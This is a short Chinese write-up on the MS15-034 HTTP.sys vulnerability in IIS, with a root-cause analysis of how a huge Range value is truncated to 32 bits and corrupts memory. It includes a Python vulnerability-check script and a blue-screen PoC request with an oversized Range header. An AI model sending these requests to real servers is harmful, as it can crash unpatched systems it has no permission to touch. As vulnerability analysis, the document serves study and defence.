零、MS15-034POC核心部分(参考巡风):
1 socket.setdefaulttimeout(timeout) 2 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 3 s.connect((ip, int(port))) 4 flag = "GET / HTTP/1.0\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n" 5 s.send(flag) 6 data = s.recv(1024) 7 s.close() 8 if ‘Requested Range Not Satisfiable‘ in data and ‘Server: Microsoft‘ in data: 9 print "vuln"
一、MS15-034 HTTP.sys漏洞原理考证:
原理部分参考:http://www.ijiandao.com/safe/cto/12821.html
1 #举例:蓝屏POC 2 """ 3 GET /welcome.png HTTP/1.1 4 Host: PoC 5 Range: bytes=12345-18446744073709551615 6 """
这个地方的Range字段在IIS内部HTTP!UlBuildFastRangeCacheMdlChain(用于生成响应报文的缓存MDL链,来描述HTTP响应的状态行、头部与消息体。)这个函数中会调用一次nt! IoBuildPartialMdl函数来生成MDL链。这这个函数里,会计算length这个值:
注意这里明确要求了由VirtualAddress与Length确定的区间必须是SourceMdl描述的缓冲区的一个自区间,正是对此要求的违反导致了此漏洞中的内存破坏。
第3次调用nt! IoBuildPartialMdl来生成消息体MDL时的参数如下:
SourceMdl = 0xfffffa801a38cb60
SourceMdl.VirtualAddress = 0xfffffa801ac94000
SourceMdl.ByteCount = 0x2d315
SourceMdl.ByteOffset = 0x0
TargetMdl = 0xfffffa801a2ed580
TargetMdl.VirtualAddress = 0xfffffa801ac97000
TargetMdl.ByteCount = 0xffffcfc7
TargetMdl.ByteOffset = 0x39
VirtualAddress = 0xfffffa801ac97039
Length = 0xffffcfc7这里的Length是根据HTTP请求消息头部中的Range字段计算得到的,过程如下:
首先,在HTTP!UlpParseRange中对Range字段进行解析,得到RangeBegin、RangeEnd;
然后,计算RangeLength = RangeEnd – RangeBegin + 1;
最后,将RangeLength截断为32位得到Length。
以PoC中的Range: bytes=12345-18446744073709551615为例:
RangeBegin = 12345 = 0x3039
RangeEnd = 18446744073709551615 = 0xffffffffffffffff
RangeLength = 0xffffffffffffffff – 0x00003039 + 1 = 0xffffffffffffcfc7
Length = 0xffffcfc7
显然由于Length超长而导致违反了nt! IoBuildPartialMdl的要求,进而造成内存破坏。
